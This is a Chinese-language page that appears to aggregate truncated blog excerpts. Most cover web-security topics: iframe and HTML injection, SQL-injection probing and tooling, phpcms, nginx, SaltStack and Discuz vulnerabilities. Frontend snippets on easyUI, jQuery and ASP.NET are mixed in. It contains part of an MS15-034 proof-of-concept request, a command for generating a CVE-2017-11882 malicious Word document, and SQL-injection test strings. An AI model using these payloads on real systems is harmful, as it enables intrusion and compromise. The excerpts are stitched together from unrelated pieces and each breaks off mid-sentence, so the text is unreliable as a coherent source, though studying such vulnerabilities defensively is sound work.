最近学校进行安全等级评估,有人给我打电话,说我之前写的一个网站存在iframe注入漏洞,页面是error页面.我于是用netsparker扫描了自己的网站,果然发现error页面存在漏洞,我写网站的时候,为了方便知道当前程序错误,写了一个error页面,代码如下 if (!IsPostBack) { div_error.InnerHtml = Application["error"].ToString() + "<br/>" + "<a…
背景 这里讲解HTML注入和iFrame注入,其他的本质都是HTML的改变.那么有人会问,XSS与HTML注入有啥区别呢?其实本质上都是没有区别的,改变前端代码,来攻击客户端,但是XSS可以理解为注入了富文本语言程序代码,而HTML注入只注入了超文本标记语言,不涉及富文本程序代码的问题.这里的iframe注入实际上就是一个阅读器,可以阅读通过协议加载的活服务器本地的文件. HTML注入 在这里不在区分GET和POST,没有任何意义,只看一下反射和存储. 没有防御--简单级 一般防御--中等级 直…
easyUI的window包含一个iframe,在iframe中如何关闭window? parent.$('#win').window('close');…
0x01  前言 一直在思考如何编写一个自动化注入工具,这款工具不用太复杂,但是可以用最简单.最直接的方式来获取数据库信息,根据自定义构造的payload来绕过防护,这样子就可以. 0x02 SQL注入工具 A.联合查询 union select 实现起来最为简单,报错注入的实现方式也基本一致,主要思路:获取所有数据库名--选择数据库--查看这个数据库下所有表---选择表--查询这个表下所有列名. 代码详情: #! /usr/bin/env python # _*_ coding:utf- _*…
contents() V1.2概述 查找匹配元素内部所有的子节点(包括文本节点).如果元素是一个iframe,则查找文档内容   示例 描述:大理石平台检定规程 查找所有文本节点并加粗 HTML 代码: <p>Hello <a href="http://ejohn.org/">John</a>, how are you doing?</p> jQuery 代码: $("p").contents().not("…
如果是程序: Response.Write("<script language=javascript>");                Response.Write("window.parent.document.getElementById('I1').src='Left.aspx';");                Response.Write("</script>");其中L1是需要刷新的iframe的ID,…
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析. phpcms2008是国内深受站长建站使用的一个内容CMS管理系统,phpcms的开源话,免费,动态,静态生成,API接口,模板免费下载,自定义内容设计,可提供程序的二次开发与设计,大大方便了整个互联网站长的建站使用与优化.…
nginx解析漏洞,配置不当,目录遍历漏洞复现 1.Ubuntu14.04安装nginx-php5-fpm 安装了nginx,需要安装以下依赖 sudo apt-get install libpcre3 libpcre3-dev sudo apt-get install zlib1g.dev sudo apt-get install libssl-dev 安装php: apt-get install php5-fpm apt-get install nginx 开启Nginx对php的支持,去掉…
前言:   2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在认证绕过致命令执行漏洞以及目录遍历漏洞.在多个微信群和QQ群已经有群友反映中招,请马上修复. 以下为通知详情: 1.漏洞描述   SaltStack是基于Python开发的一套C/S架构配置管理工具.国外某安全团队披露了SaltStack存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652).在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意…
摘要:静态代码检查又称为静态程序分析,是指在不运行计算机程序的条件下,进行程序分析的方法. 本文分享自华为云社区<公司新来了一个质量工程师,说团队要保证 0 error,0 warning>,作者:敏捷的小智 . 公司新来了一个质量工程师,说要进行过程改善.提高质量.降本增效--因此一系列的分析.报告和新增的质量活动陆续上线,其中被大家吐槽最多的是:check清零.什么意思呢?就是质量工程师会监督静态代码检查的修复结果,团队要保证 0 error,0 warning . 图1 check清零…
判断mysql网站是否存在注入漏洞的几个方法: 注入点后加上一个单引号会报错 and 1=1返回正常页面,and 1=2返回的页面不同于正常页面 and sleep(3) 网页会等待3秒左右 根据返回的页面情况我们就能知道是否存在注入漏洞 要获取页面返回的结果是不是一样的,我们可以通过获取请求头中的Content-Length的长度来判断 知道这些后,我们就能来写个简单的python脚本 # -*- coding:utf-8 -*- __author__ = "MuT6 Sch01aR"…
今天开始着手分析第一个漏洞,找了一上午靶机,发现一个含有成人内容的违法网站是用dz6.0搭的,今天就看看dz这个版本的洞了 问题函数位置:my.php第623行 if(is_array($descriptionnew)) {//动态初始化$descriptionnew foreach($descriptionnew as $buddyid => $desc) {//buddyid=key if(($desc = cutstr(dhtmlspecialchars($desc), 255)) !=…
0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql注入对渗透的作用: 获取数据 sql注入特性: 攻击方法由数据库类型决定 攻击结果由数据库决定 漏洞代码: sql.php <?php $id=$_GET['x']; $sql="select * from news where id=$x"; 还没完 ?> 当我们在网页执行访…
最近项目要交付了,对方安全测试的时候检测出高危险漏洞,由于刚参加工作不久,经验不足,未涉及过此方面的东西.经过一番查询和探索,最终解决了这个问题,记录一下. 发现的漏洞为缺少跨框架脚本保护.跨框架脚本(XFS)漏洞使攻击者能够在恶意页面的 HTMLiframe 标记内加载易受攻击的应用程序.攻击者可以使用       此漏洞设计点击劫持攻击,以实施钓鱼式攻击.框架探查攻击.社会工程攻击或跨站点请求伪造攻击.个人理解就是其他网站会在他的iframe中调用我的网站内容,来截取他人的点击事件或者窃取他…
iframe作为一个网站之间交互的桥梁,受到很多站长的喜爱,但是又有不安全的因素存在,所以正确填写属性是很重要的. <iframe name="my_iframe" height="540" width="100%" frameborder="0"       marginwidth="0" marginheight="0" scrolling="no" bor…
[csharp] view plaincopyprint?using Microsoft.VisualBasic; using System; using System.Collections; using System.Collections.Generic; using System.Data; using System.Diagnostics; using System.Collections.Specialized; using Microsoft.JScript; namespace…
随着Windows 8.1这个饱受诟病的操作系统的推出,微软想一举改变颓势,也只有从用户体验上下手了. 近来,微软针对Windows 8.1的漏洞,推出了三项奖励措施: 1.对于发现关键性漏洞,并且这一漏洞能帮助Windows 8.1解决一系列安全问题的开发者,可以获得高达10万美金的奖励. 2.有漏洞就得有人填上,对于能打上漏洞补丁的开发者,也将可以获得5万美元的奖励. 3.IE11我是还没用过,但对于举报IE11重要漏洞的开发者,也将可以获得1.1万美元的奖励. 真的充分体现了微软的不差钱,…
零.MS15-034POC核心部分(参考巡风): socket.setdefaulttimeout(timeout) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, int(port))) flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" s.send(flag) data =…
群里有个人想在微信页面里面加弹出框.作为前端的我,想着不可能这样做.后来一个人说了: A:如果对方没有防盗链的话,你可以建个页面,内置iframe 到他的页面,然后把url 的参数也传入你的iframe.广告什么的就在你的主页面弹就好了 B:咋实现啊?A:或者你可以做的酷一点.就是用模拟http 请求预先获取他的页面内容,然后重新排版渲染到你的页面上 B:很多盗版小说网站都是这么干的   我于是想到了一个解决方案: <!DOCTYPE html> <html lang="en&…
依赖注入 什么是依赖注入 使用一个会创建和查找依赖对象的容器,让它负责供给对象. 当a对象需要b对象时,不再是使用new创建,而是从容器中获取,对象与对象之间是松散耦合的关系,有利于功能复用. 依赖:应用程序依赖容器,需要的对象都从容器获取 注入:容器将对象注入到应用程序中 设计思路 我们必须告诉容器:哪些类是由容器来创建的:哪些类是要从容器中获取的 使用两个注解对类进行标记 容器必须对所有类进行扫描,将标记过的类创建和注入 扫描src文件夹下所有java为后缀的文件 使用反射的方式查看类定义,…
本次MS08-067严重漏洞各系统补丁地址例如以下: 中文操作系统KB958644补丁下载地址: Windows Vista 安全更新程序 (KB958644) http://download.microsoft.com/download/d/c/0/dc047ab9-53f8-481c-8c46-528b7f493fc1/Windows6.0-KB958644-x86.msu Windows Server 2008 x64 Edition 安全更新程序 (KB958644) http://do…
公共父页面(主页面): <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+"://"+request.getServerName()+":"+…
我试过类似$('#win').window('close');报$.data...options无效的错误,我已经引入了js文件,路径没问题,而且在同一个页面,不用iframe是可以关闭的 在iframe的页面中,我试图通过调用$(parent.document).find('#win').window('close')方法去关闭window窗口,但是报js错:$.data...options无效. 解决方法:parent.$('#win').window('close');          …
layer.open({ type: 2, title: "专家信息", area: ['100%', '100%'], content: '/ZhuanJiaKu/AddZhuanJiaItem?isManager=true&zhuanJiaPersonalId=' + personalId, success: function (layero, index) { var body = layer.getChildFrame('body', index); var ifram…
前言:在平时的写代码中为了解耦.方便扩展,经常使用一些DI容器(如:Autofac.Unity),那是特别的好用. 关于它的底层实现代码 大概是这样. 一.使用依赖注入的好处 关于使用依赖注入创建对象的好处网上一找就是一大堆(低耦合.可配置等),这里就不复制粘贴了. 二.使用XML+Assembly实现可配置的Container namespace com.cqgc.TestSys.Core { public class Container { private static Container…
$(top.parent.iframeId).contents().find("#selector") //iframeId为iframe的id名称…
如果IFrame_A  想执行 IFrame_B 中 RefreshSelf() 函数,可以按以下方法写: 此js代码写在 IFrame_A 中 parent.Xrm.Page.getControl("IFRAME_B").getObject().contentWindow.RefreshSelf();…
猫宁~~~ 虚拟机上进行 安装windows 2008 R2 查看服务器ip 本地连接属性,取消ipv6,ip设置为192.168.43.158,子网掩码255.255.255.0,网关192.168.43.1,DNS设置192.168.43.1 打开初始配置任务,添加服务器角色,选择active directory域服务 dcpromo,开启active directory域服务安装向导,新林中新建域,输入域名www.pjzhang.com,密码设置123.aaa,重启计算机 安装window…
昨晚看到的有复现的文章,一直到今天才去自己复现了一遍,还是例行记录一下. POC: https://github.com/Ridter/CVE-2017-11882/ 一.简单的生成弹计算器的doc文件. 网上看到的改进过的POC,我们直接拿来用,命令如下: #python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc 生成的doc文件直接打开就可以弹出计算器. 影响的脚本: Office 365 Micr…